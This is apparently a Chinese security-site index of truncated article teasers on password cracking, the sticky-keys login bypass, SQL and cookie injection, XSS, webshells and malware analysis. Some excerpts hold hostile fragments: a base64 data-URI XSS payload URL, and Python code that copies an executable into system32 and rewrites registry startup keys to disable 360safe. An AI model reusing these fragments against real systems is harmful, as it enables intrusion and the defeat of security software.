密码失而复得 RAR文件密码破解器
来源:安全中国RAR是款常见压缩格式主要运用于文件存储和传递互联网上提供下载资源中RAR格式占很大比重出于安全需求以及隐私保护有相当部分RAR文件被加上了密码解不开密码RAR文件如同垃圾文件样无用所以解开RAR密码就显得尤为重要了 RAR Password Recovery是款专业而全面RAR密码破解工具通过相应设置就能破解RAR加密文件解压缩密码密码破译工具支持暴力破解基于字典破解和非常独特“B... [阅读全文]
web日志分析:用Webalizer分析Web日志
来源:安全中国、介绍 Webalizer是个高效、免费Web服务器日志分析其分析结果以HTML文件格式保存从而可以很方便通过Web服务器进行浏览Internet上很多站点都使用Webalizer进行Web服务器日志分析Webalizer具有以下些特性: 1. Webalizer是用C写所以其具有很高运行效率在主频为200Mhz机器上Webalizer每秒钟可以分析10000条记录所以分析... [阅读全文]
vistaxp双系统:另类破解双系统Vista密码
来源:安全中国安装XP+Vista双系统用户越来越多不过总有些马大哈们会忘记Vista账户密码由于Vista采用比XP更为严格登录认证如果遗忘登录密码我们是很难进入系统不过微软在登录界面有个粘滞键漏洞可以用它来进入Vista 粘滞键漏洞是指我们在登录界面按 5下Sh启动粘滞键(系统目录下hc.exe)因此我们可以在XP下用cmd.exe替换hc.exe启动命令提示符然后利用命令提示符进入Vi... [阅读全文]
winpcap:突破网吧Winpcap安装限制——权限魔术
来源:安全中国我们在安装WinPcap 往往出现下面 两种情况 如何解决那?=blogimg src="http://www.crazycoder.cn/WebFiles/20099/f08695d2-3d7d-4dcb-b10d-04ab576c5c95.jpg" border=0 small="0"=blogimg src="http://www.crazycoder.cn/WebFiles/... [阅读全文]
简单不求人 轻松让你击破ATA硬盘密码
来源:安全中国有些人利用ATA密码来保护储存在计算机硬盘中数据但是在大多数情况下攻击者都能轻松破译ATA密码全面访问硬盘中数据 在美国盗取个人及企业计算系统中敏感信息已成为增长速度最快罪行的据GartnerIDC等分析机构统计有近80%笔记本电脑存有公司敏感信息并有逐渐增加趋势 这现象对于企业商业管理和整体成功非常关键因此个人及企业都在努力寻找高性价比并且便于使用存储方式来防止敏感信息泄漏 A... [阅读全文]
pgp加密软件:PGP加密原理
来源:安全中国PGP是个基于RSA公匙加密体系邮件加密软件Software可以用它对你邮件保密以防止非授权者阅读它还能对你邮件加上数字签名从而使收信人可以确信邮件是你发来它让你可以安全地和你从未见过人们通讯事先并不需要任何保密渠道用来传递密匙它采用了:审慎密匙管理种RSA和传统加密杂合算法用于数字签名邮件文摘算法加密前压缩等还有个良好人机工程设计它功能强大有很快速度而且它源代码是免费 实际上PGP... [阅读全文]
检测到仿真程序:对抗启发式代码仿真检测技术分析
作者: nEINEI 邮箱: [email protected] 完成于: 08-05-06 最近在研究病毒检测技术虽然在这个木马、流氓件猖獗年代检测技术(除了考虑效率原因外)已经变得不是十分重要了但俺仍然出于兴趣想从这里面寻找些思路或许对抗技术本身并不在于谁彻底打败了谁而在于彼此间共同进步在查阅资料中发现了这篇文章(Anti heuristic techniqu... [阅读全文]
winform:Data URI XSS和验证About XHR POST Form Data
superheiData:_URI_scheme:http://superhei.blogbus.com/logs/23355141.html我拿这个做了下实验:http://hi.baidu.com/xss?jump_url=data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEyNy4wLjAuMS9iYWlkdS5qcz48L3NjcmlwdD4N... [阅读全文]
趋势科技网站:对趋势科技等数万网站WebSite被攻击的分析
BY: rayh4c.cn . 首先在网上找到了这次攻击新闻报道http://www.nsfocus.net/s/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通过GOOGLE搜索到了相关被黑页面http://www.google.cn/search?hl=zh-CN&q=site%3Atrendmi... [阅读全文]
社会工程学:社会工程学入侵 3部曲
来源:安全中国大家定知道超级黑客凯文·米特尼克吧深为他社会工程学所折服美国国防部、 5角大楼、中央情报局、北美防空系统……都是他闲庭信步地方没有人怀疑他真实身份对于他所想获得信息如鱼得水这便是社会工程学魅力当然社会工程学不是那么困难难以撑握本文分为社会工程学—信息刺探、社会工程学—心理学应用、社会工程学—反查技术等 3部曲使大家走入社会工程学神秘世界 社会工程学师般都干了什么呢?恐怕小菜们定很想知... [阅读全文]
python注册表:用python修改注册表干掉360safe
文章作者:吴杰信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)import _winregimport osimport shutil #复制自身shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe') #把360启动改为自身run = _winreg.OpenKey( _winreg.HKEY_LO... [阅读全文]
社会工程学:社会工程学利用 3个步骤
来源:安全中国大家定知道超级黑客凯文·米特尼克吧深为他社会工程学所折服美国国防部、 5角大楼、中央情报局、北美防空系统……都是他闲庭信步地方没有人怀疑他真实身份对于他所想获得信息如鱼得水这便是社会工程学魅力当然社会工程学不是那么困难难以撑握本文分为社会工程学—信息刺探、社会工程学—心理学应用、社会工程学—反查技术等 3部曲使大家走入社会工程学神秘世界 社会工程学师般都干了什么呢?恐怕小菜们定很想知... [阅读全文]
跨站脚本攻击:跨站脚本-攻击和防御指向
原文:milw0rm.com作者:Xylitol翻译:老臧首发:http://lovelaozang.cn摘要:1什么是XSS?2XSS脚本攻击3制造个cookie攻击4保护XSS5笨思路方法6过滤绕过7Flash攻击8XSS 上传9XSS 钓鱼跨站脚本脚本是个浏览器同时利用利用个漏洞为基础安全解决方案 这次袭击使内容(脚本) 在无特权区被执行和权限个特权区-即个特权升级和客户端(浏览器)执行脚本... [阅读全文]
跨站脚本:字符集导致的浏览器跨站脚本攻击
来源:安全中国前言:这种利用类型攻击早在06年就被安全研究人员指出不过直没有在国内重视而由于我们国内大部分站点正是这种有漏洞集所以影响还是比较大希望各大站快速修复可以看看http://applesoup.googlepages.com/ 文中已经被替换为〈,如果需要文档,请访问http://www.80sec.com/release/char-xss.txt 在般web里显示数据给浏览器时候都... [阅读全文]
mysql修改密码:修改破解MYSQL密码思路方法大全
思路方法 使用phpmyadmin这是最简单了修改mysql库user表不过别忘了使用PASSWORD 思路方法 2 使用mysqladmin这是前面声明个特例 mysqladmin -u root -p password mypasswd 输入这个命令后需要输入root原密码然后root密码将改为mypasswd 把命令里root改为你用户名你就可以改你自己密码了 当然如果你mysqladm... [阅读全文]
sql注入:注入限制绕过
来源:安全中国突然想我们是否可以用什么思路方法绕过SQL注入限制呢?到网上考察了下提到思路方法大多都是针对AND和“’”号和“=”号过滤突破虽然有点进步地方但还是有些关键字没有绕过由于我不常入侵网站WebSite所以也不敢对上述过滤效果进行评论但是可以肯定是效果不会很好…… 经过我收集大部分防注入都过滤了以下关键字: and | select | update | chr | delete |... [阅读全文]
脚本攻击sql注入:网站WebSiteSQL脚本注入的不常见思路方法
来源:安全中国☆ 全站文章系统采用FSO静态生成HTML文件来显示这样做好处来可以减轻服务器负担提高访问速度 2是阻止SQL注入式攻击... 文章系统原理: 全部文章均在数据库存有个副本另处根据模板生成个HTML页面 攻击思路方法:查看源文件里面是否有通过JS来页面 如script language="javascript" src="count.asp?id=1552"/script来更新文章浏... [阅读全文]
漏洞修复:从 ' or' =' or' 漏洞安全检测到修复手法
来源:安全中国实施修复思路方法有很多在这里介绍两种咱们使用第2种 思路方法1: Replace过滤 解决思路方法:查找login.asp下from找到下边类似 username=request.Form("name") pass=request.Form("pass") 修改为: username=Replace(request.Form("name"), "’",... [阅读全文]
映像劫持技术:眼见为虚——解析映像劫持技术
来源:安全中国. 诡异中毒现象 在成品检验科文员办公室台电脑上折腾半个小时后计算机维护部门技术员只觉得眼皮不停狂跳从刚开始接手这个任务开始他就直在做无用功:他随身带U盘里引以为豪众多维护工具包在这台机器上全军覆没无论他直接在U盘上运行还是随便复制到哪个目录里系统都是报告“找不到文件”或者直接没有运行起来反应他第次感受到了恐惧文件分明就好好在眼皮底下可它们就是“找不到”或死活不肯执行莫非是在这台... [阅读全文]
加壳脱壳:实战Armadillo V3.60标准加壳方式的脱壳
来源:安全中国现在 Armadillo3.6脱壳文章还没有所以昨晚小妹闲着没事便用Armadillo V3.60专业版加了记事本壳(XP)想试试3.6壳有无区别的处脱下来总体感觉标准版壳和3.4差不多所以主要思路方法还是采用以前那些作者思路方法区别的处我加以介绍说明但COPYMEM2方式应该有了变化目前正在研究中 【调试环境】:WinXP、Ollydbg1.10b、PEiD、LordPE、Im... [阅读全文]
webshell:CGI Hack和Webshell研究资料整理
来源:安全中国总体思路跳过限制查看敏感文件和密码相关文件写入句话cgi进后台试传webshell(后台如果加验证或者MD5过时候可以试着 cookies欺骗本地提交)寻找可执行目录和相关拿shell…………提权 感谢EMM和ps睿智和他们高超脚本技术还有以前老红4脚本群英和国外那些牛淫们 注“ perl脚本漏洞大多出在open、system或者 ’’中前者允许读写和执行而后两个允许... [阅读全文]
cookies注入:Cookies的注入思路方法和原理
来源:安全中国现在很多网站WebSite都采用了通用防注入那么对于这种网站WebSite我门是否就束手无策了呢?答案是否定我们可以采用cookie 注入思路方法而很多通用防注入对这种注入方式都没有防备在讲的前,我们还是来回顾下ASP脚本中Request对象知识吧,上面几讲中都提到Request对象获取客户端提交数据常用是GET和POST 2种方式,同时request对象可以不通过集合来获得数据,即... [阅读全文]
推荐:CSRF:不要低估了我的危害和攻击能力
作者:iceskysl来源:IceskYsl@1sters!CSRF这种攻击方式虽然提出来很久(在2006年时候就有了)了但是这个沉睡攻击巨人直到前不久才逐渐走入我们视线到底CSRF是啥危害到底有多大?常见利用方式是如何今天作为“安全相关 | Security”分类第篇文章我按照自己理解告诉你不要低估了CSRF危害性和攻击能力、什么是CSRF先看看CSRF原文介绍说明如下: Cross Site... [阅读全文]
邮件病毒入侵后的正确查杀思路方法
来源:安全中国不小心点开了带病毒邮件发现时为时已晚如何办?我想大家第时间想到定是用杀毒软件Software查杀没错有了病毒就要查杀人的常情吗!可是大家却忽略了非常重要几个步骤下面编辑就来给大家介绍下邮件病毒入侵后清除步骤 、断开网络 当你不幸遭遇病毒入侵的后当机立断件事就是断开你网络连接以避免病毒进步扩散 2、文件备份 然后就是删除带毒邮件再运行杀毒软件Software进行清除但... [阅读全文]
sqlmd5:SQL注射修改难猜解的MD5
来源:安全中国在线破解MD5网站WebSite上查但有MD5密码很偏所以些新手会放弃我为新手介绍种很简单就能修改难猜解MD5密码思路方法 常入侵高手就忽略过.. 随便找个地址 http://www.xxx.org/s.asp?id=121 在地址后输入单引号显示 Microsoft OLE DB Provider for SQL Server ’80040e14’ 串 ’... [阅读全文]
imagefile:系统对Image File Execution Options的检测流程小探
来源:安全中国 Image File Execution Options说熟悉又陌生年来大家谈起映像劫持都是它Debugger键值问题实现IFEO劫持只是在注册表写个键而已轻松到没技术含量然而系统到底是如何识别呢或者说系统这个功能是如何使它自己走入圈套呢? 早前给电脑报写了篇简单谈IFEO文章当时托大家找了些资料TK翻到MSDN里相关描述明确指出“当父进程不是作用子进程调试器时Create... [阅读全文]
sm5win.exe:感染型下载者WIN.exe部分行为分析(下)
2、被感染文件中加入内容及其行为分析 被感染后加入个.WIN节入口点指向其中 最前面0C5内容是“数据区”其中可明显看出有意义部分包括以下内容(以下地址为相对.WIN节头偏移):************************************************************************************ 1. 预留空间保存变量(在被感染... [阅读全文]
sm5win.exe:感染型下载者WIN.exe部分行为分析(上)
来源:安全中国本文涉及问题:1. 它是如何感染个.EXE或.SCR文件2. 被感染文件被加入代码内容及其行为3. 基于1和2简要介绍说明被感染文件修复问题本文没有涉及问题:1. 该病毒如何修改注册表2. 该病毒生成哪些病毒体文件(包括是否在磁盘根目录生成病毒副本)3. 该病毒如何下载其他病毒4. 该病毒感染哪些文件夹下文件以上这些内容就待各位同仁去挖掘了样本来源:剑盟样本区http://bbs.j... [阅读全文]
代理服务器ccproxy:代理服务器软件SoftwareCCProxy用户快速入门
来源;安全中国 1.运行下载ccproxyup.exe 2.点击"Next"3. 选择安装文件夹,默认是C盘CCProxy文件夹,点击"Next" 4.继续点击"Next" 5.继续点击"Next"6.点击"Install"7.至此,CCProxy安装完毕.接下来设置客户端IE.假设安装代理服务器CCProxy机器IP地址是:192.168.0.1,选择IE菜单“工具”-“Internet 选项”... [阅读全文]
黑客嗅探软件:认识黑客入侵的利器 嗅探软件Software逐个了解
来源:安全中国嗅探器(也称网络分析器)是种能够察看网络传输、将其解码并为网管提供可用数据种软件Software网管可以使用它提供数据来诊断网络存在问题而恶意用户还会利用嗅探器来从网络上获取存储在文本中密码下面列举些常用专用嗅探器:NAI嗅探器(商用)、Wireshark(以前叫Ethereal是种LinuxWindows以及其他平台上使用开发源码图形用户界面嗅探器)、TCPDump(开放源码命令行... [阅读全文]
